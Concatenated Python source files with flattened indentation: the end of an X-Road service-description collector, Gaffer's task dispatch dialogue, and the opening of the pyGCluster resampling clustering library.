json_history = json.loads(json_history_file.data.decode('utf-8'))
except NoSuchKey:
LOGGER.info('History file history.json not found')
else:
try:
with open('{}/history.json'.format(params['path']), 'r') as json_file:
json_history = json.load(json_file)
except IOError:
LOGGER.info('History file history.json not found')
json_history.append({'reportTime': formatted_time, 'reportPath': 'index_{}.json'.format(
suffix)})
json_history.sort(key=sort_by_report_time, reverse=True)
if params['minio']:
write_json('{}history.json'.format(params['minio_path']), json_history, params)
write_json('{}filtered_history.json'.format(params['minio_path']), filtered_history(
json_history, params), params)
else:
write_json('{}/history.json'.format(params['path']), json_history, params)
write_json('{}/filtered_history.json'.format(params['path']), filtered_history(
json_history, params), params)
# Replace index.json with latest report
if params['minio']:
params['minio_client'].copy_object(
params['minio_bucket'], '{}index.json'.format(params['minio_path']),
'/{}/{}index_{}.json'.format(params['minio_bucket'], params['minio_path'], suffix))
else:
shutil.copy('{}/index_{}.json'.format(
params['path'], suffix), '{}/index.json'.format(params['path']))
# Updating status
json_status = {'lastReport': formatted_time}
if params['minio']:
write_json('{}status.json'.format(params['minio_path']), json_status, params)
else:
write_json('{}/status.json'.format(params['path']), json_status, params)
start_cleanup(params)
def main():
"""Main function"""
logging.config.dictConfig(DEFAULT_LOGGER)
parser = argparse.ArgumentParser(
        description='Collect WSDL and OpenAPI service descriptions from X-Road members.',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog='By default peer TLS certificate is not validated.'
)
parser.add_argument(
'config', metavar='CONFIG_FILE',
help='Configuration file')
args = parser.parse_args()
config = load_config(args.config)
if config is None:
sys.exit(1)
configure_logging(config)
params = set_params(config)
if params is None:
sys.exit(1)
if not params['minio']:
if not make_dirs(params['path']):
sys.exit(1)
if params['minio']:
prepare_minio_client(params)
try:
shared_params = xrdinfo.shared_params_ss(
addr=params['url'], instance=params['instance'], timeout=params['timeout'],
verify=params['verify'], cert=params['cert'])
except xrdinfo.XrdInfoError as err:
LOGGER.error('Cannot download Global Configuration: %s', err)
sys.exit(1)
# Create and start new threads
threads = []
for _ in range(params['thread_cnt']):
thread = Thread(target=worker, args=(params,))
thread.daemon = True
thread.start()
threads.append(thread)
# Populate the queue
try:
for subsystem in xrdinfo.registered_subsystems(shared_params):
if subsystem[2] in params['excluded_member_codes']:
LOGGER.info('Skipping excluded member %s', identifier_path(subsystem))
continue
if [subsystem[2], subsystem[3]] in params['excluded_subsystem_codes']:
LOGGER.info('Skipping excluded subsystem %s', identifier_path(subsystem))
continue
params['work_queue'].put(subsystem)
except xrdinfo.XrdInfoError as err:
LOGGER.error('Cannot process Global Configuration: %s', err)
sys.exit(1)
# Block until all tasks in queue are done
params['work_queue'].join()
    # Set shutdown event and wait until all daemon threads finish
params['shutdown'].set()
for thread in threads:
thread.join()
process_results(params)
if __name__ == '__main__':
main()
|
DispatchDialogue.py
|
##########################################################################
#
# Copyright (c) 2018, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import sys
import threading
import traceback
import IECore
import Gaffer
import GafferDispatch
import GafferUI
## A dialogue which can be used to dispatch tasks
class DispatchDialogue( GafferUI.Dialogue ) :
## Defines what happens when the tasks have been successfully dispatched :
#
# Close : The dialogue is closed immediately.
#
# Confirm : The dialogue remains open confirming success, with a button for returning to the editing state.
PostDispatchBehaviour = IECore.Enum.create( "Close", "Confirm" )
__dispatchDialogueMenuDefinition = None
def __init__( self, tasks, dispatchers, nodesToShow, postDispatchBehaviour=PostDispatchBehaviour.Confirm, title="Dispatch Tasks", sizeMode=GafferUI.Window.SizeMode.Manual, **kw ) :
GafferUI.Dialogue.__init__( self, title, sizeMode=sizeMode, **kw )
self._getWidget().setBorderStyle( GafferUI.Frame.BorderStyle.None )
self.__dispatchers = dispatchers
self.__tasks = tasks
self.__nodesToShow = nodesToShow
self.__script = tasks[0].scriptNode()
# hold a reference to the script window so plugs which launch child windows work properly.
# this is necessary for PlugValueWidgets like color swatches and ramps. Ideally those widgets
# wouldn't rely on the existence of a ScriptWindow and we could drop this acquisition.
self.__scriptWindow = GafferUI.ScriptWindow.acquire( self.__script )
self.__postDispatchBehaviour = postDispatchBehaviour
# build tabs for all the node, dispatcher, and context settings
with GafferUI.ListContainer() as self.__settings :
mainMenu = GafferUI.MenuBar( self.menuDefinition() )
mainMenu.setVisible( False )
with GafferUI.TabbedContainer() as self.__tabs :
for node in self.__nodesToShow :
nodeFrame = GafferUI.Frame( borderStyle=GafferUI.Frame.BorderStyle.None, borderWidth=0 )
nodeFrame.addChild( self.__nodeEditor( node ) )
# remove the per-node execute button
Gaffer.Metadata.registerValue( node, "layout:customWidget:dispatchButton:widgetType", "", persistent = False )
self.__tabs.setLabel( nodeFrame, node.relativeName( self.__script ) )
with GafferUI.ListContainer() as dispatcherTab :
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing=2, borderWidth=4 ) as dispatcherMenuColumn :
GafferUI.Label( "<h4>Dispatcher</h4>" )
self.__dispatchersMenu = GafferUI.MultiSelectionMenu( allowMultipleSelection = False, allowEmptySelection = False )
self.__dispatchersMenu.append( [ x.getName() for x in self.__dispatchers ] )
self.__dispatchersMenu.setSelection( [ self.__dispatchers[0].getName() ] )
self.__dispatchersMenuChanged = self.__dispatchersMenu.selectionChangedSignal().connect( Gaffer.WeakMethod( self.__dispatcherChanged ) )
dispatcherMenuColumn.setVisible( len(self.__dispatchers) > 1 )
self.__dispatcherFrame = GafferUI.Frame( borderStyle=GafferUI.Frame.BorderStyle.None, borderWidth=0 )
self.__tabs.setLabel( dispatcherTab, "Dispatcher" )
with GafferUI.Frame( borderStyle=GafferUI.Frame.BorderStyle.None, borderWidth=4 ) as contextTab :
GafferUI.PlugValueWidget.create( self.__script["variables"] )
self.__tabs.setLabel( contextTab, "Context Variables" )
# build a ui element for progress feedback and messages
with GafferUI.ListContainer( spacing = 4 ) as self.__progressUI :
with GafferUI.ListContainer( parenting = { "horizontalAlignment" : GafferUI.HorizontalAlignment.Center, "verticalAlignment" : GafferUI.VerticalAlignment.Center } ) :
self.__progressIconFrame = GafferUI.Frame( borderStyle = GafferUI.Frame.BorderStyle.None, parenting = { "horizontalAlignment" : GafferUI.HorizontalAlignment.Center } )
self.__progressLabel = GafferUI.Label( parenting = { "horizontalAlignment" : GafferUI.HorizontalAlignment.Center } )
with GafferUI.Collapsible( "Details", collapsed = True, parenting = { "expand" : True } ) as self.__messageCollapsible :
self.__messageWidget = GafferUI.MessageWidget()
# connect to the collapsible state change so we can increase the window
# size when the details pane is first shown.
self.__messageCollapsibleConneciton = self.__messageCollapsible.stateChangedSignal().connect( Gaffer.WeakMethod( self.__messageCollapsibleChanged ) )
self.__backButton = self._addButton( "Back" )
self.__backButtonConnection = self.__backButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__initiateSettings ) )
self.__primaryButton = self._addButton( "Dispatch" )
self.__setDispatcher( dispatchers[0] )
self.__initiateSettings( self.__primaryButton )
@staticmethod
def createWithDefaultDispatchers( tasks, nodesToShow, defaultDispatcherType=None, postDispatchBehaviour=PostDispatchBehaviour.Confirm, title="Dispatch Tasks", sizeMode=GafferUI.Window.SizeMode.Manual, **kw ) :
defaultType = defaultDispatcherType if defaultDispatcherType else GafferDispatch.Dispatcher.getDefaultDispatcherType()
dispatcherTypes = list(GafferDispatch.Dispatcher.registeredDispatchers())
if defaultType and defaultType in dispatcherTypes :
dispatcherTypes.remove( defaultType )
dispatcherTypes.insert( 0, defaultType )
dispatchers = []
for key in dispatcherTypes :
dispatcher = GafferDispatch.Dispatcher.create( key )
Gaffer.NodeAlgo.applyUserDefaults( dispatcher )
dispatchers.append( dispatcher )
return DispatchDialogue( tasks, dispatchers, nodesToShow, postDispatchBehaviour=postDispatchBehaviour, title = title, sizeMode = sizeMode, **kw )
def scriptNode( self ) :
return self.__script
def setVisible( self, visible ) :
if visible :
# See comment in `GafferUI.NodeSetEditor.acquire()`
self._qtWidget().resize( 400, 400 )
GafferUI.Window.setVisible( self, visible )
## Returns an IECore.MenuDefinition which is used to define the keyboard shortcuts for all DispatchDialogues.
# This can be edited at any time to modify subsequently created DispatchDialogues.
# Typically editing would be done as part of gaffer startup. Note that this menu is never shown to users,
# but we need it in order to register keyboard shortcuts.
@classmethod
def menuDefinition( cls ) :
if cls.__dispatchDialogueMenuDefinition is None :
cls.__dispatchDialogueMenuDefinition = IECore.MenuDefinition()
return cls.__dispatchDialogueMenuDefinition
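	# As a sketch of such a startup edit (the menu path, command and shortcut below are
	# hypothetical examples, not part of Gaffer's defaults), a startup config could do :
	#
	#	GafferUI.DispatchDialogue.menuDefinition().append(
	#		"/Dispatch/Dispatch Selected",
	#		{ "command" : someCallable, "shortCut" : "Ctrl+Return" }
	#	)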
def __nodeEditor( self, node ) :
editor = GafferUI.NodeEditor( self.__script )
editor.setNodeSet( Gaffer.StandardSet( [ node ] ) )
## \todo: Expose public API for the NodeEditor's NameWidget visibility
editor._NodeEditor__nameWidget.setVisible( False )
editor._NodeEditor__nameWidget.parent()[0].setVisible( False )
return editor
def __setDispatcher( self, dispatcher ) :
self.__currentDispatcher = dispatcher
self.__dispatcherFrame.setChild( self.__nodeEditor( self.__currentDispatcher ) )
def __dispatcherChanged( self, menu ) :
for dispatcher in self.__dispatchers :
if dispatcher.getName() == menu.getSelection()[0] :
self.__setDispatcher( dispatcher )
return
def __initiateSettings( self, button ) :
self.__backButton.setEnabled( False )
self.__backButton.setVisible( False )
self.__primaryButton.setText( "Dispatch" )
self.__primaryButton.setEnabled( True )
self.__primaryButton.setVisible( True )
self.__primaryButtonConnection = self.__primaryButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__initiateDispatch ) )
self.__tabs.setCurrent( self.__tabs[0] )
self._getWidget().setChild( self.__settings )
def __initiateDispatch( self, button ) :
self.__progressIconFrame.setChild( GafferUI.BusyWidget() )
self.__progressLabel.setText( "<h3>Dispatching...</h3>" )
self.__backButton.setVisible( False )
self.__backButton.setEnabled( False )
self.__primaryButton.setVisible( False )
self.__primaryButton.setEnabled( False )
self.__messageWidget.clear()
self.__messageCollapsible.setCollapsed( True )
self._getWidget().setChild( self.__progressUI )
threading.Thread( target = self.__dispatch ).start()
def __dispatch( self ) :
try :
with self.__messageWidget.messageHandler() :
with self.__script.context() :
self.__currentDispatcher.dispatch( self.__tasks )
result = 0
except Exception, e :
result = sys.exc_info()
GafferUI.EventLoop.executeOnUIThread( functools.partial( self.__finish, result ) )
def __finish( self, result ) :
if result == 0 :
self.__initiateResultDisplay()
else :
self.__initiateErrorDisplay( result )
def __initiateErrorDisplay( self, exceptionInfo ) :
self.__progressIconFrame.setChild( GafferUI.Image( "failure.png" ) )
self.__progressLabel.setText( "<h3>Failed</h3>" )
self.__messageCollapsible.setCollapsed( False )
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Debug,
"Python Traceback",
"".join( traceback.format_exception( *exceptionInfo ) )
)
# this works for RuntimeError, but is this safe for all exceptions?
userFriendlyException = exceptionInfo[1].args[0].strip( "\n" ).split( "\n" )[-1]
userFriendlyException += "\nSee DEBUG messages for more information."
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Error,
"Problem Dispatching {nodes}".format( nodes = str( [ task.relativeName( self.__script ) for task in self.__tasks ] ) ),
userFriendlyException,
)
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButton._qtWidget().setFocus()
self.__primaryButton.setText( "Quit" )
self.__primaryButton.setEnabled( True )
self.__primaryButton.setVisible( True )
self.__primaryButtonConnection = self.__primaryButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
def __initiateResultDisplay( self ) :
# Although we computed a result successfully, there may still be minor problems
# indicated by messages emitted - check for those.
problems = []
for level in ( IECore.Msg.Level.Error, IECore.Msg.Level.Warning ) :
count = self.__messageWidget.messageCount( level )
if count :
problems.append( "%d %s%s" % ( count, IECore.Msg.levelAsString( level ).capitalize(), "s" if count > 1 else "" ) )
if not problems and self.__postDispatchBehaviour == self.PostDispatchBehaviour.Close :
self.close()
return
self.__progressIconFrame.setChild(
GafferUI.Image( "successWarning.png" if problems else "success.png" )
)
completionMessage = "Completed"
if problems :
completionMessage += " with " + " and ".join( problems )
self.__messageCollapsible.setCollapsed( False )
self.__progressLabel.setText( "<h3>" + completionMessage + "</h3>" )
self.__messageCollapsible.setVisible( self.__messageWidget.messageCount() )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__primaryButton.setText( "Ok" )
self.__primaryButton.setEnabled( True )
self.__primaryButton.setVisible( True )
self.__primaryButtonConnection = self.__primaryButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__primaryButton._qtWidget().setFocus()
def __close( self, *unused ) :
self.close()
def __messageCollapsibleChanged( self, collapsible ) :
if not collapsible.getCollapsed() :
# make the window bigger to better fit the messages, but don't make
# it any smaller than it currently is.
self.resizeToFitChild( shrink = False )
# remove our connection - we only want to resize the first time we
# show the messages. after this we assume that if the window is smaller
# it is because the user has made it so, and wishes it to remain so.
self.__messageCollapsibleConneciton = None
|
pyGCluster.py
|
#!/usr/bin/env python2.7
"""
pyGCluster is a clustering algorithm focusing on noise injection for subsequent cluster validation.
By requesting identical cluster identity, the reproducibility of a large amount of clusters
obtained with agglomerative hierarchical clustering (AHC) is assessed.
Furthermore, a multitude of different distance-linkage combinations (DLCs) are evaluated.
Finally, associations of highly reproducible clusters, called communities, are created.
Graphical representation of the results as node maps and expression maps is implemented.
The pyGCluster module contains the main class :py:class:`pyGCluster.Cluster` and some functions
| :py:func:`pyGCluster.create_default_alphabet`
| :py:func:`pyGCluster.resampling_multiprocess`
| :py:func:`pyGCluster.seekAndDestry`
| :py:func:`pyGCluster.yield_noisejected_dataset`
"""
#
# pyGCluster
#
# Copyright (C) D. Jaeger and C. Fufezan
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
from __future__ import print_function
import sys, os
from collections import defaultdict as ddict
from collections import OrderedDict
import math
import time
import random
import subprocess
import string
import codecs
import bisect
import multiprocessing
import itertools
if sys.version_info[0] == 3:
import pickle
def unicode(x, errors=None):
return x
input = input
else:  # Python 2, explicitly import cPickle
import cPickle as pickle
input = raw_input
def yield_noisejected_dataset(data, iterations):
'''
Generator yielding a re-sampled dataset with each iteration.
A re-sampled dataset is created by re-sampling each data point
from the normal distribution given by its associated mean and standard deviation value.
    See the example in the Supplementary Material of pyGCluster's publication for how to define your own noise function (e.g. uniform noise).
:param data: dictionary ( OrderedDict! ) holding the data to be re-sampled.
:type data: collections.OrderedDict()
:param iterations: the number of re-sampled datasets this generator will yield.
:type iterations: int
    :rtype: numpy.ndarray (one re-sampled dataset is yielded per iteration)
'''
import numpy
# the check that no condition is missing in arg: data is made prior, in Cluster.__init__()
# this is required, because only equally shaped arrays can be clustered!
# otherwise, 'ValueError: setting an array element with a sequence.'
Random = numpy.random.RandomState() # get instance for new seed!
n_conditions = len( data[ sorted( data.keys() )[ 0 ] ] )
simulated_dataset = numpy.zeros( ( len( data ), n_conditions ) )
for i in range( iterations ):
for row_index, identifier in enumerate( data ):
for col_index, (condition, data_tuple) in enumerate( data[ identifier ].items() ):
mean, sd = data_tuple
new_ratio = Random.normal( mean, sd )
simulated_dataset[ row_index ][ col_index ] = new_ratio
yield simulated_dataset
return
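# A minimal usage sketch (identifiers and conditions below are hypothetical, but the
# OrderedDict layout matches what Cluster.__init__ builds): each yielded value is a
# numpy array of shape (number of identifiers, number of conditions), with every cell
# re-drawn from numpy.random.normal(mean, sd).
#
#     data = OrderedDict()
#     data['gene_A'] = OrderedDict([('cond_1', (0.5, 0.1)), ('cond_2', (-1.2, 0.3))])
#     data['gene_B'] = OrderedDict([('cond_1', (0.1, 0.2)), ('cond_2', (0.8, 0.1))])
#     for simulated in yield_noisejected_dataset(data, 3):
#         pass  # 'simulated' has shape (2, 2)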
def create_default_alphabet():
'''
    Returns the default alphabet which is used to save clusters in a less memory-intensive form:
instead of saving e.g. a cluster containing identifiers with indices of 1,20,30 as "1,20,30", the indices are converted to a baseX system -> "1,k,u".
The default alphabet that is returned is:
>>> string.printable.replace( ',', '' )
:rtype: string
'''
return string.printable.replace( ',', '' )
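# With this default alphabet (string.printable minus the comma, i.e. 99 characters),
# resampling_multiprocess() below encodes object indices positionally: indices 0-9 stay
# '0'-'9', 10-35 become 'a'-'z', 36-61 become 'A'-'Z', and so on, which is why a cluster
# of the objects with indices 1, 20 and 30 is stored as "1,k,u".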
def seekAndDestry(processes):
'''
    Any process in the given list that is still alive is terminated.
:param processes: list containing multiprocess.Process()
:type processes: list
:rtype: none
'''
for p in processes:
if p.is_alive():
p.terminate()
return
def resampling_multiprocess(
DataQ = None,
data = None,
iterations = 5000,
alphabet = None,
dlc = None,
min_cluster_size = 4,
min_cluster_freq_2_retain = 0.001,
function_2_generate_noise_injected_datasets = None
):
'''
    This is the function that is called in each multiprocess that is spawned internally by pyGCluster during the re-sampling routine.
    Agglomerative hierarchical clustering is performed for each distance-linkage combination (DLC) on each of the *iterations* re-sampled datasets.
Clusters from each hierarchical tree are extracted, and their counts are saved in a temporary cluster-count matrix.
After *iterations* iterations, clusters are filtered according to min_cluster_freq_2_retain.
These clusters, together with their respective counts among all DLCs, are returned.
The return value is a list containing tuples with two elements: cluster (string) and counts ( one dimensional np.array )
:param DataQ: data queue which is used to pipe the re-sampling results back to pyGCluster.
:type DataQ: multiprocessing.Queue()
:param data: dictionary ( OrderedDict! ) holding the data to be clustered -> passed through to the noise-function.
:type data: collections.OrderedDict()
:param iterations: the number of iterations this multiprocess is going to perform.
:type iterations: int
:param alphabet: in order to save memory, the indices describing a cluster are converted to a specific alphabet (rather than decimal system).
:type alphabet: string
:param dlc: list of the distance-linkage combinations that are going to be evaluated.
:type dlc: list
:param min_cluster_size: minimum size of a cluster to be considered in the re-sampling routine (smaller clusters are discarded)
:type min_cluster_size: int
    :param min_cluster_freq_2_retain: once all iterations are performed, clusters are filtered at 50% of this threshold before being returned (the value is typically forwarded from pyGCluster).
:type min_cluster_freq_2_retain: float
:param function_2_generate_noise_injected_datasets: function to generate re-sampled datasets.
:type function_2_generate_noise_injected_datasets: function
:rtype: list
'''
import numpy
import scipy.spatial.distance as ssd
imported_from_scipy = False
try:
from fastcluster import linkage as ahc
except ImportError:
try:
from scipy.cluster.hierarchy import linkage as ahc
imported_from_scipy = True
except ImportError:
print('You do require either "fastcluster" or "scipy"!')
if DataQ is None or data is None:
        print( '[ ERROR ] need a Data-Queue and a data object! Returning ...' )
return
if alphabet is None:
alphabet = create_default_alphabet()
assert ',' not in alphabet, '[ ERROR ] the alphabet must not contain a comma (",")!'
if dlc is None:
dlc = [ 'euclidean-average' ] # NOTE maybe better have all as default ! :)
if function_2_generate_noise_injected_datasets is None:
function_2_generate_noise_injected_datasets = yield_noisejected_dataset
n_objects = len( data.keys() )
n_dlc = len( dlc )
metrices = set( [ combo.split( '-' )[ 0 ] for combo in dlc ] )
# build lookup-dict to convert index into baseX system, given by alphabet
baseX = len( alphabet )
index2baseX = { 0 : '0' }
for index in range( 1, n_objects ):
old_index = index
digits = [] # modified ref: http://stackoverflow.com/questions/2267362/convert-integer-to-a-string-in-a-given-numeric-base-in-python
while index:
digits.append( alphabet[ index % baseX ] )
            index //= baseX  # integer division; round() would corrupt the conversion under Python 3
digits.reverse()
converted_index = ''.join( digits )
index2baseX[ old_index ] = converted_index
# build initial template of 'clusters'-dict (which is needed to extract clusters from the hierarchical tree)
clusters_template = { ID : [ index2baseX[ ID ] ] for ID in range( n_objects ) }
# initialize temporary cluster-count matrix and the other necessary objects to fill it
tmpstruct_clustercount_monitor = {}
tmpstruct_clustercount_monitor[ 'Cluster counts' ] = numpy.zeros( ( 10 ** 6, n_dlc ), dtype = numpy.uint32 )
tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ] = {}
tmpstruct_clustercount_monitor[ 'Distance-linkage combinations' ] = dlc
tmpstruct_clustercount_monitor[ 'Cluster sieve' ] = set()
tmpstruct_clustercount_monitor[ 'Discarded IDs' ] = set()
# get simulated datasets
for simulated_dataset in function_2_generate_noise_injected_datasets( data, iterations ):
# calculate distance matrices:
metric2condenseddist = {}
if not imported_from_scipy:
for metric in metrices:
metric2condenseddist[ metric ] = ssd.pdist( simulated_dataset, metric = metric )
# perform AHC:
for dlc_index, combo in enumerate( dlc ):
metric, linkage = combo.split( '-' )
'''
linkage matrix example:
original data:
[[1,2,3],
[3,2,1],
[1,3,5]]
Linkage matrix representing AHC with euclidean distance and ward linkage:
[[ 0. , 2. , 2.23606798, 2. ], CLUSTER ID 3
[ 1. , 3. , 4.2031734 , 3. ]] CLUSTER ID 4
^ child1 ^ child2 ^ distance ^ cluster size
Hence, element 0 and 2 were merged into cluster with ID = 3 (size = 2),
then element 1 and cluster 3 are merged into the root cluster with ID = 4 (size = 3).
'''
# perform AHC
if imported_from_scipy:
linkage_matrix = ahc( simulated_dataset, method = linkage, metric = metric )
else:
linkage_matrix = ahc( metric2condenseddist[ metric ], method = linkage, preserve_input = True )
# reconstruct clusters from the linkage matrix
clusters = {} # key = clusterID, value = cluster-indices
clusters.update( clusters_template )
clusterID_linkagematrix = n_objects - 1
for childID_1, childID_2, dist, size in linkage_matrix:
clusterID_linkagematrix += 1
cluster_linkagematrix = sorted( clusters[ childID_1 ] + clusters[ childID_2 ] )
clusters[ clusterID_linkagematrix ] = cluster_linkagematrix
if len( cluster_linkagematrix ) < min_cluster_size:
continue
cluster = ','.join( cluster_linkagematrix )
# insert cluster into tmpstruct_clustercount_monitor and update it:
# but add only if its count > 1 (determined via the 'Cluster sieve'):
add = False
if cluster in tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ]:
clusterID = tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ][ cluster ]
add = True
else:
if cluster in tmpstruct_clustercount_monitor[ 'Cluster sieve' ]:
if tmpstruct_clustercount_monitor[ 'Discarded IDs' ]:
try:
clusterID = tmpstruct_clustercount_monitor[ 'Discarded IDs' ].pop()
except KeyError: # KeyError: 'pop from an empty set' = set is empty
clusterID = len( tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ] )
else:
clusterID = len( tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ] )
tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ][ cluster ] = clusterID
add = True
else:
tmpstruct_clustercount_monitor[ 'Cluster sieve' ].add( cluster )
add = False
if add:
# increase count by 1
# if new cluster, add 10 ** 5 new rows
try:
tmpstruct_clustercount_monitor[ 'Cluster counts' ][ clusterID ][ dlc_index ] += 1
except IndexError:
tmpstruct_clustercount_monitor[ 'Cluster counts' ] = numpy.concatenate(
( tmpstruct_clustercount_monitor['Cluster counts'],
numpy.zeros( ( 10 ** 5, n_dlc ), dtype = numpy.uint32 )
)
)
tmpstruct_clustercount_monitor[ 'Cluster counts' ][ clusterID ][ dlc_index ] += 1 # increase count by 1
del clusters
del metric2condenseddist
del simulated_dataset
# only transfer clusters equal or above 50% of 'min_cluster_freq_2_retain' threshold to pyGCluster:
min_count = int( min_cluster_freq_2_retain * iterations * 0.5 )
clusterIDs2retain = set( numpy.nonzero( tmpstruct_clustercount_monitor[ 'Cluster counts' ] >= min_count )[ 0 ] )
cluster_counts_list = []
for cluster, clusterID in tmpstruct_clustercount_monitor[ 'Cluster 2 clusterID' ].items():
if clusterID in clusterIDs2retain:
counts = tmpstruct_clustercount_monitor[ 'Cluster counts' ][ clusterID ]
cluster_counts_list.append( (cluster, counts) )
del tmpstruct_clustercount_monitor
DataQ.put( cluster_counts_list )
del cluster_counts_list
return
class Cluster(dict):
'''
The pyGCluster class
:param working_directory: directory in which all results are written (requires write-permission!).
:type working_directory: string
:param verbosity_level: either 0, 1 or 2.
:type verbosity_level: int
:param data: Dictionary containing the data which is to be clustered.
:type data: dict
In order to work with the default noise-injection function as well as plot
expression maps correctly, the data-dict **has** to have the following
structure.
Example:
>>> data = {
... Identifier1 : {
... condition1 : ( mean11, sd11 ),
... condition2 : ( mean12, sd12 ),
... condition3 : ( mean13, sd13 ),
... },
... Identifier2 : {
... condition2 : ( mean22, sd22 ),
... condition3 : ( mean23, sd23 ),
... condition3 : ( mean13, sd13 ),
... },
... }
>>> import pyGCluster
>>> ClusterClass = pyGCluster.Cluster(data=data, verbosity_level=1, working_directory=...)
.. note ::
If any condition for an identifier in the "nested_data_dict"-dict is missing,
this entry is discarded, i.e. not imported into the Cluster Class.
This is because pyGCluster does not implement any missing value estimation.
One possible solution is to replace missing values by a mean value and a standard
deviation that is representative for the complete data range in the given condition.
pyGCluster inherits from the regular Python Dictionary object.
Hence, the attributes of pyGCluster can be accessed as Python Dictionary keys.
A selection of the most important attributes / keys are:
>>> # general
>>> ClusterClass[ 'Working directory' ]
... # this is the directory where all pyGCluster results
... # (pickle objects, expression maps, node map, ...) are saved into.
/Users/Shared/moClusterDirectory
    >>> # original data can be accessed via
>>> ClusterClass[ 'Data' ]
... # this collections.OrderedDict contains the data that has been
... # or will be clustered (see also below).
... plenty of data ;)
>>> ClusterClass[ 'Conditions' ]
... # sorted list of all conditions that are defined in the "Data"-dictionary
[ 'condition1', 'condition2', 'condition3' ]
>>> ClusterClass[ 'Identifiers' ]
... # sorted tuple of all identifiers, i.e. ClusterClass[ 'Data' ].keys()
( 'Identifier1', 'Identifier2' , ... 'IdentifierN' )
    >>> # re-sampling parameters
>>> ClusterClass[ 'Iterations' ]
... # the number of datasets that were clustered.
1000000
>>> ClusterClass[ 'Cluster 2 clusterID' ]
... # dictionary with clusters as keys, and their respective row index
... # in the "Cluster count"-matrix (= clusterID) as values.
{ ... }
>>> ClusterClass[ 'Cluster counts' ]
... # numpy.uint32 matrix holding the counts for each
... # distance-linkage combination of the clusters.
>>> ClusterClass[ 'Distance-linkage combinations' ]
... # sorted list containing the distance-linkage combinations
    ... # that were evaluated in the re-sampling routine.
>>> # Communities
>>> ClusterClass[ 'Communities' ]
... # see function pyGCluster.Cluster.build_nodemap for further information.
>>> # Visualization
>>> ClusterClass[ 'Additional labels' ]
... # dictionary with an identifier of the "Data"-dict as key,
... # and a list of additional information (e.g. annotation, GO terms) as value.
{
'Identifier1' :
['Photosynthesis related' , 'zeroFactor: 12.31' ],
'Identifier2' : [ ... ] ,
...
}
>>> ClusterClass[ 'for IO skip clusters bigger than' ]
... # Default = 100. Since some clusters are really large
... # (with sizes close to the root (the cluster holding all objects)),
... # clusters with more objects than this value
... # are not plotted as expression maps or expression profile plots.
pyGCluster offers the possibility to save the analysis (e.g. after re-sampling)
via :py:func:`pyGCluster.Cluster.save` , and continue
via :py:func:`pyGCluster.Cluster.load`
Initializes pyGCluster.Cluster class
Classically, users start the multiprocessing clustering routine with multiple
distance linkage combinations via the :py:func:`pyGCluster.Cluster.do_it_all`
function. This function allows to update the pyGCluster class with all user
parameters before it calls :py:func:`pyGCluster.Cluster.resample`.
The main advantage in calling :py:func:`pyGCluster.Cluster.do_it_all` is
that all general plotting functions are called afterwards as well, these are:
| :py:func:`pyGCluster.Cluster.plot_clusterfreqs`
| :py:func:`pyGCluster.Cluster.build_nodemap`
| :py:func:`pyGCluster.Cluster.write_dot`
| :py:func:`pyGCluster.Cluster.draw_community_expression_maps`
If one choses, one can manually update the parameters (setting the key, value
pairs in pyGCluster) and then evoke :py:func:`pyGCluster.Cluster.resample`
with the appropriate parameters. This useful if certain memory intensive
distance-linkage combinations are to be clustered on a specific computer.
.. note ::
        Cluster Class can be initialized empty and filled using :py:func:`pyGCluster.Cluster.load`
'''
def __init__(self, data = None, working_directory = None, verbosity_level = 1):
self.delete_resampling_results() # initializes important variables
if working_directory is None:
working_directory = os.getcwd()
self[ 'Working directory' ] = working_directory
self[ 'for IO skip clusters bigger than' ] = 100
self[ 'Version' ] = (0, 7, 1)
self[ 'Verbosity level' ] = verbosity_level
